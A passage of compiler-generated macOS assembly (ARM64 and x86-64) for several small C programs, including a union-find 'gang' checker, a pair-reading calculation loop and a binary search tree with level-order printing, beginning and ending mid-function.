L_.str.5(%rip), %rdi movb $0, %al callq _printf LBB2_14: ## in Loop: Header=BB2_7 Depth=2 jmp LBB2_15 LBB2_15: ## in Loop: Header=BB2_7 Depth=2 jmp LBB2_17 LBB2_16: ## in Loop: Header=BB2_7 Depth=2 movl -12(%rbp), %edi callq _diff movl %eax, %edi callq _root movl %eax, -28(%rbp) movl -16(%rbp), %edi callq _root movl %eax, -32(%rbp) movl -32(%rbp), %edx movslq -28(%rbp), %rcx movq _num@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) movl -32(%rbp), %edi callq _diff movl %eax, -44(%rbp) ## 4-byte Spill movl -28(%rbp), %edi callq _diff movl -44(%rbp), %edx ## 4-byte Reload movslq %eax, %rcx movq _num@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) LBB2_17: ## in Loop: Header=BB2_7 Depth=2 jmp LBB2_18 LBB2_18: ## in Loop: Header=BB2_7 Depth=2 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB2_7 LBB2_19: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_1 LBB2_20: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _n,4,2 ## @n .comm _N,4,2 ## @N .comm _num,800008,4 ## @num .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d%d" L_.str.2: ## @.str.2 .asciz "%c%d%d" L_.str.3: ## @.str.3 .asciz "Not sure yet.\n" L_.str.4: ## @.str.4 .asciz "In the same gang.\n" L_.str.5: ## @.str.5 .asciz "In different gangs.\n" .subsections_via_symbols
the_stack_data/97109.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _calc ; -- Begin function calc .p2align 2 _calc: ; @calc .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str d0, [sp, #40] str d1, [sp, #32] str x0, [sp, #24] str x1, [sp, #16] mov w8, #1 str w8, [sp, #12] ldr w8, [sp, #12] ldr x9, [sp, #24] str w8, [x9] ldr d0, [sp, #32] ldr s2, [sp, #12] ; implicit-def: $d1 fmov s1, s2 sshll.2d v1, v1, #0 ; kill: def $d1 killed $d1 killed $q1 scvtf d1, d1 fmul d0, d0, d1 fcvtzs w8, d0 ldr x9, [sp, #16] str w8, [x9] add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf stur wzr, [x29, #-12] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 mov x9, sp sub x8, x29, #24 str x8, [x9] add x8, sp, #32 str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur d0, [x29, #-24] ldr d1, [sp, #32] add x0, sp, #28 add x1, sp, #24 bl _calc ldr w8, [sp, #24] ; implicit-def: $x10 mov x10, x8 ldr w9, [sp, #28] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_4: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%lf%lf" l_.str.2: ; @.str.2 .asciz "%d\n%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _calc ## -- Begin function calc .p2align 4, 0x90 _calc: ## @calc .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movsd %xmm0, -8(%rbp) movsd %xmm1, -16(%rbp) movq %rdi, -24(%rbp) movq %rsi, -32(%rbp) movl $1, -36(%rbp) movl -36(%rbp), %ecx movq -24(%rbp), %rax movl %ecx, (%rax) movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero cvtsi2sdl -36(%rbp), %xmm1 mulsd %xmm1, %xmm0 cvttsd2si %xmm0, %ecx movq -32(%rbp), %rax movl %ecx, (%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $0, -12(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl -8(%rbp), %eax je LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 leaq L_.str.1(%rip), %rdi leaq -24(%rbp), %rsi leaq -32(%rbp), %rdx movb $0, %al callq _scanf movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd -32(%rbp), %xmm1 ## xmm1 = mem[0],zero leaq -36(%rbp), %rdi leaq -40(%rbp), %rsi callq _calc movl -40(%rbp), %esi movl -36(%rbp), %edx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_4: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%lf%lf" L_.str.2: ## @.str.2 .asciz "%d\n%d\n" .subsections_via_symbols
the_stack_data/927444.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str wzr, [sp, #12] mov w8, #-5 str w8, [sp, #8] str w8, [sp, #4] str w8, [sp] ldr w8, [sp, #8] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: str wzr, [sp, #4] str wzr, [sp, #8] b LBB0_3 LBB0_2: str wzr, [sp, #4] str wzr, [sp, #8] mov w8, #-5 str w8, [sp, #8] b LBB0_3 LBB0_3: mov w0, #0 str wzr, [sp] str wzr, [sp, #4] str wzr, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) movl $-5, -8(%rbp) movl $-5, -12(%rbp) movl $-5, -16(%rbp) cmpl $0, -8(%rbp) jge LBB0_2 ## %bb.1: movl $0, -12(%rbp) movl $0, -8(%rbp) jmp LBB0_3 LBB0_2: movl $0, -12(%rbp) movl $0, -8(%rbp) movl $-5, -8(%rbp) LBB0_3: movl $0, -16(%rbp) movl $0, -12(%rbp) movl $0, -8(%rbp) xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/35197.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _listInit ; -- Begin function listInit .p2align 2 _listInit: ; @listInit .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] ; kill: def $x9 killed $xzr str xzr, [x8, #8] ldr x8, [sp, #8] str xzr, [x8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _listEmpty ; -- Begin function listEmpty .p2align 2 _listEmpty: ; @listEmpty .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] ldr x8, [x8] subs x8, x8, #0 cset w8, eq and w8, w8, #0x1 str w8, [sp, #4] ldr w0, [sp, #4] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _push_back ; -- Begin function push_back .p2align 2 _push_back: ; @push_back .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str x1, [sp, #8] mov x0, #16 bl _malloc str x0, [sp] ldr x8, [sp, #8] ldr x9, [sp] str x8, [x9] ldr x8, [sp] ; kill: def $x9 killed $xzr str xzr, [x8, #8] ldr x0, [sp, #16] bl _listEmpty subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ldr x8, [sp] ldr x9, [sp, #16] ldr x9, [x9] str x8, [x9, #8] ldr x8, [sp] ldr x9, [sp, #16] str x8, [x9] b LBB2_3 LBB2_2: ldr x8, [sp] ldr x9, [sp, #16] str x8, [x9] ldr x9, [sp, #16] str x8, [x9, #8] b LBB2_3 LBB2_3: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _removeFirst ; -- Begin function removeFirst .p2align 2 _removeFirst: ; @removeFirst .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] ldr x8, [x8, #8] str x8, [sp, #16] ldur x8, [x29, #-8] ldr x8, [x8, #8] ldr x8, [x8] str x8, [sp, #8] ldur x8, [x29, #-8] ldr x8, [x8, #8] ldr x8, [x8, #8] ldur x9, [x29, #-8] str x8, [x9, #8] ldur x8, [x29, #-8] ldr x8, [x8, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: ldur x8, [x29, #-8] ; kill: def $x9 killed $xzr str xzr, [x8] b LBB3_2 LBB3_2: ldr x0, [sp, #16] bl _free ldr x0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _init ; -- Begin function init .p2align 2 _init: ; @init .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] str wzr, [x8, #8] ldr x8, [sp, #8] ; kill: def $x9 killed $xzr str xzr, [x8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _find ; -- Begin function find .p2align 2 _find: ; @find .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str x0, [sp, #32] str w1, [sp, #28] str x2, [sp, #16] ldr x8, [sp, #32] ldr x8, [x8] str x8, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: mov w8, #1 str w8, [sp, #44] b LBB5_15 LBB5_2: b LBB5_3 LBB5_3: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB5_13 b LBB5_4 LBB5_4: ; in Loop: Header=BB5_3 Depth=1 ldr w8, [sp, #28] ldr x9, [sp, #8] ldr w9, [x9] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB5_6 b LBB5_5 LBB5_5: ; in Loop: Header=BB5_3 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #24] str x8, [sp, #8] b LBB5_3 LBB5_6: ; in Loop: Header=BB5_3 Depth=1 ldr w8, [sp, #28] ldr x9, [sp, #8] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_8 b LBB5_7 LBB5_7: ; in Loop: Header=BB5_3 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #16] str x8, [sp, #8] b LBB5_3 LBB5_8: ; in Loop: Header=BB5_3 Depth=1 ldr w8, [sp, #28] ldr x9, [sp, #8] ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB5_12 b LBB5_9 LBB5_9: ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB5_11 b LBB5_10 LBB5_10: str wzr, [sp, #44] b LBB5_15 LBB5_11: ldr x8, [sp, #8] str x8, [sp, #16] str wzr, [sp, #44] b LBB5_15 LBB5_12: ; in Loop: Header=BB5_3 Depth=1 b LBB5_3 LBB5_13: b LBB5_14 LBB5_14: mov w8, #1 str w8, [sp, #44] b LBB5_15 LBB5_15: ldr w0, [sp, #44] add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _insert ; -- Begin function insert .p2align 2 _insert: ; @insert .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur w1, [x29, #-20] ldur x8, [x29, #-16] ldr x8, [x8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB6_4 b LBB6_1 LBB6_1: mov x0, #32 bl _malloc str x0, [sp, #32] ldr x8, [sp, #32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB6_3 b LBB6_2 LBB6_2: mov w8, #2 stur w8, [x29, #-4] b LBB6_19 LBB6_3: ldur w8, [x29, #-20] ldr x9, [sp, #32] str w8, [x9] ldr x8, [sp, #32] ; kill: def $x9 killed $xzr str xzr, [x8, #24] ldr x8, [sp, #32] str xzr, [x8, #16] ldr x8, [sp, #32] str xzr, [x8, #8] ldr x8, [sp, #32] ldur x9, [x29, #-16] str x8, [x9] ldur x9, [x29, #-16] ldr w8, [x9, #8] add w8, w8, #1 str w8, [x9, #8] stur wzr, [x29, #-4] b LBB6_19 LBB6_4: ldur x0, [x29, #-16] ldur w1, [x29, #-20] mov x2, #0 bl _find subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB6_6 b LBB6_5 LBB6_5: mov w8, #1 stur w8, [x29, #-4] b LBB6_19 LBB6_6: ldur x8, [x29, #-16] ldr x8, [x8] str x8, [sp, #16] b LBB6_7 LBB6_7: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB6_17 b LBB6_8 LBB6_8: ; in Loop: Header=BB6_7 Depth=1 ldr x8, [sp, #16] str x8, [sp, #24] ldur w8, [x29, #-20] ldr x9, [sp, #16] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_14 b LBB6_9 LBB6_9: ; in Loop: Header=BB6_7 Depth=1 ldr x8, [sp, #16] ldr x8, [x8, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB6_13 b LBB6_10 LBB6_10: mov x0, #32 bl _malloc str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB6_12 b LBB6_11 LBB6_11: mov w8, #2 stur w8, [x29, #-4] b LBB6_19 LBB6_12: ldur w8, [x29, #-20] ldr x9, [sp, #8] str w8, [x9] ldr x8, [sp, #8] ; kill: def $x9 killed $xzr str xzr, [x8, #16] ldr x8, [sp, #8] str xzr, [x8, #24] ldr x8, [sp, #24] ldr x9, [sp, #8] str x8, [x9, #8] ldr x8, [sp, #8] ldr x9, [sp, #24] str x8, [x9, #16] ldur x9, [x29, #-16] ldr w8, [x9, #8] add w8, w8, #1 str w8, [x9, #8] stur wzr, [x29, #-4] b LBB6_19 LBB6_13: ; in Loop: Header=BB6_7 Depth=1 ldr x8, [sp, #16] ldr x8, [x8, #16] str x8, [sp, #16] b LBB6_7 LBB6_14: ; in Loop: Header=BB6_7 Depth=1 ldr x8, [sp, #16] ldr x8, [x8, #24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB6_16 b LBB6_15 LBB6_15: mov x0, #32 bl _malloc str x0, [sp] ldur w8, [x29, #-20] ldr x9, [sp] str w8, [x9] ldr x8, [sp] ; kill: def $x9 killed $xzr str xzr, [x8, #16] ldr x8, [sp] str xzr, [x8, #24] ldr x8, [sp, #24] ldr x9, [sp] str x8, [x9, #8] ldr x8, [sp] ldr x9, [sp, #24] str x8, [x9, #24] ldur x9, [x29, #-16] ldr w8, [x9, #8] add w8, w8, #1 str w8, [x9, #8] stur wzr, [x29, #-4] b LBB6_19 LBB6_16: ; in Loop: Header=BB6_7 Depth=1 ldr x8, [sp, #16] ldr x8, [x8, #24] str x8, [sp, #16] b LBB6_7 LBB6_17: b LBB6_18 LBB6_18: mov w8, #1 stur w8, [x29, #-4] b LBB6_19 LBB6_19: ldur w0, [x29, #-4] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _printTree ; -- Begin function printTree .p2align 2 _printTree: ; @printTree .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] ldur x8, [x29, #-8] ldr x8, [x8] str x8, [sp, #24] str wzr, [sp, #20] ldur x0, [x29, #-16] ldr x1, [sp, #24] bl _push_back b LBB7_1 LBB7_1: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-16] bl _listEmpty subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB7_10 b LBB7_2 LBB7_2: ; in Loop: Header=BB7_1 Depth=1 ldur x0, [x29, #-16] bl _removeFirst str x0, [sp, #8] ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] ldr w8, [sp, #20] ldur x9, [x29, #-8] ldr w9, [x9, #8] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB7_4 b LBB7_3 LBB7_3: ; in Loop: Header=BB7_1 Depth=1 ldr x8, [sp, #8] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB7_5 LBB7_4: ; in Loop: Header=BB7_1 Depth=1 ldr x8, [sp, #8] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB7_5 LBB7_5: ; in Loop: Header=BB7_1 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB7_7 b LBB7_6 LBB7_6: ; in Loop: Header=BB7_1 Depth=1 ldur x0, [x29, #-16] ldr x8, [sp, #8] ldr x1, [x8, #16] bl _push_back b LBB7_7 LBB7_7: ; in Loop: Header=BB7_1 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB7_9 b LBB7_8 LBB7_8: ; in Loop: Header=BB7_1 Depth=1 ldur x0, [x29, #-16] ldr x8, [sp, #8] ldr x1, [x8, #24] bl _push_back b LBB7_9 LBB7_9: ; in Loop: Header=BB7_1 Depth=1 b LBB7_1 LBB7_10: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x0, #16 str x0, [sp, #8] ; 8-byte Folded Spill bl _malloc mov x8, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload stur x8, [x29, #-16] bl _malloc str x0, [sp, #24] ldur x0, [x29, #-16] bl _init ldr x0, [sp, #24] bl _listInit str wzr, [sp, #20] b LBB8_1 LBB8_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #7 cset w8, ge tbnz w8, #0, LBB8_4 b LBB8_2 LBB8_2: ; in Loop: Header=BB8_1 Depth=1 mov x9, sp add x8, sp, #16 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _scanf ldur x0, [x29, #-16] ldr w1, [sp, #16] bl _insert b LBB8_3 LBB8_3: ; in Loop: Header=BB8_1 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB8_1 LBB8_4: ldur x0, [x29, #-16] ldr x1, [sp, #24] bl _printTree ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d " l_.str.1: ; @.str.1 .asciz "%d\n" l_.str.2: ; @.str.2 .asciz "%d" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _listInit ## -- Begin function listInit .p2align 4, 0x90 _listInit: ## @listInit .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq $0, 8(%rax) movq -8(%rbp), %rax movq $0, (%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _listEmpty ## -- Begin function listEmpty .p2align 4, 0x90 _listEmpty: ## @listEmpty .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax cmpq $0, (%rax) sete %al andb $1, %al movzbl %al, %eax movl %eax, -12(%rbp) movl -12(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _push_back ## -- Begin function push_back .p2align 4, 0x90 _push_back: ## @push_back .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movl $16, %edi callq _malloc movq %rax, -32(%rbp) movq -24(%rbp), %rcx movq -32(%rbp), %rax movq %rcx, (%rax) movq -32(%rbp), %rax movq $0, 8(%rax) movq -16(%rbp), %rdi callq _listEmpty cmpl $0, %eax jne LBB2_2 ## %bb.1: movq -32(%rbp), %rcx movq -16(%rbp), %rax movq (%rax), %rax movq %rcx, 8(%rax) movq -32(%rbp), %rcx movq -16(%rbp), %rax movq %rcx, (%rax) jmp LBB2_3 LBB2_2: movq -32(%rbp), %rcx movq -16(%rbp), %rax movq %rcx, (%rax) movq -16(%rbp), %rax movq %rcx, 8(%rax) LBB2_3: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _removeFirst ## -- Begin function removeFirst .p2align 4, 0x90 _removeFirst: ## @removeFirst .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movq %rax, -16(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movq (%rax), %rax movq %rax, -24(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movq 8(%rax), %rcx movq -8(%rbp), %rax movq %rcx, 8(%rax) movq -8(%rbp), %rax cmpq $0, 8(%rax) jne LBB3_2 ## %bb.1: movq -8(%rbp), %rax movq $0, (%rax) LBB3_2: movq -16(%rbp), %rdi callq _free movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _init ## -- Begin function init .p2align 4, 0x90 _init: ## @init .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movl $0, 8(%rax) movq -8(%rbp), %rax movq $0, (%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _find ## -- Begin function find .p2align 4, 0x90 _find: ## @find .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq %rdx, -32(%rbp) movq -16(%rbp), %rax movq (%rax), %rax movq %rax, -40(%rbp) cmpq $0, -40(%rbp) jne LBB5_2 ## %bb.1: movl $1, -4(%rbp) jmp LBB5_15 LBB5_2: jmp LBB5_3 LBB5_3: ## =>This Inner Loop Header: Depth=1 cmpq $0, -40(%rbp) je LBB5_13 ## %bb.4: ## in Loop: Header=BB5_3 Depth=1 movl -20(%rbp), %eax movq -40(%rbp), %rcx cmpl (%rcx), %eax jle LBB5_6 ## %bb.5: ## in Loop: Header=BB5_3 Depth=1 movq -40(%rbp), %rax movq 24(%rax), %rax movq %rax, -40(%rbp) jmp LBB5_3 LBB5_6: ## in Loop: Header=BB5_3 Depth=1 movl -20(%rbp), %eax movq -40(%rbp), %rcx cmpl (%rcx), %eax jge LBB5_8 ## %bb.7: ## in Loop: Header=BB5_3 Depth=1 movq -40(%rbp), %rax movq 16(%rax), %rax movq %rax, -40(%rbp) jmp LBB5_3 LBB5_8: ## in Loop: Header=BB5_3 Depth=1 movl -20(%rbp), %eax movq -40(%rbp), %rcx cmpl (%rcx), %eax jne LBB5_12 ## %bb.9: cmpq $0, -32(%rbp) jne LBB5_11 ## %bb.10: movl $0, -4(%rbp) jmp LBB5_15 LBB5_11: movq -40(%rbp), %rax movq %rax, -32(%rbp) movl $0, -4(%rbp) jmp LBB5_15 LBB5_12: ## in Loop: Header=BB5_3 Depth=1 jmp LBB5_3 LBB5_13: jmp LBB5_14 LBB5_14: movl $1, -4(%rbp) LBB5_15: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _insert ## -- Begin function insert .p2align 4, 0x90 _insert: ## @insert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq -16(%rbp), %rax cmpq $0, (%rax) jne LBB6_4 ## %bb.1: movl $32, %edi callq _malloc movq %rax, -32(%rbp) cmpq $0, -32(%rbp) jne LBB6_3 ## %bb.2: movl $2, -4(%rbp) jmp LBB6_19 LBB6_3: movl -20(%rbp), %ecx movq -32(%rbp), %rax movl %ecx, (%rax) movq -32(%rbp), %rax movq $0, 24(%rax) movq -32(%rbp), %rax movq $0, 16(%rax) movq -32(%rbp), %rax movq $0, 8(%rax) movq -32(%rbp), %rcx movq -16(%rbp), %rax movq %rcx, (%rax) movq -16(%rbp), %rax movl 8(%rax), %ecx addl $1, %ecx movl %ecx, 8(%rax) movl $0, -4(%rbp) jmp LBB6_19 LBB6_4: movq -16(%rbp), %rdi movl -20(%rbp), %esi xorl %eax, %eax movl %eax, %edx callq _find cmpl $0, %eax jne LBB6_6 ## %bb.5: movl $1, -4(%rbp) jmp LBB6_19 LBB6_6: movq -16(%rbp), %rax movq (%rax), %rax movq %rax, -48(%rbp) LBB6_7: ## =>This Inner Loop Header: Depth=1 cmpq $0, -48(%rbp) je LBB6_17 ## %bb.8: ## in Loop: Header=BB6_7 Depth=1 movq -48(%rbp), %rax movq %rax, -40(%rbp) movl -20(%rbp), %eax movq -48(%rbp), %rcx cmpl (%rcx), %eax jge LBB6_14 ## %bb.9: ## in Loop: Header=BB6_7 Depth=1 movq -48(%rbp), %rax cmpq $0, 16(%rax) jne LBB6_13 ## %bb.10: movl $32, %edi callq _malloc movq %rax, -56(%rbp) cmpq $0, -56(%rbp) jne LBB6_12 ## %bb.11: movl $2, -4(%rbp) jmp LBB6_19 LBB6_12: movl -20(%rbp), %ecx movq -56(%rbp), %rax movl %ecx, (%rax) movq -56(%rbp), %rax movq $0, 16(%rax) movq -56(%rbp), %rax movq $0, 24(%rax) movq -40(%rbp), %rcx movq -56(%rbp), %rax movq %rcx, 8(%rax) movq -56(%rbp), %rcx movq -40(%rbp), %rax movq %rcx, 16(%rax) movq -16(%rbp), %rax movl 8(%rax), %ecx addl $1, %ecx movl %ecx, 8(%rax) movl $0, -4(%rbp) jmp LBB6_19 LBB6_13: ## in Loop: Header=BB6_7 Depth=1 movq -48(%rbp), 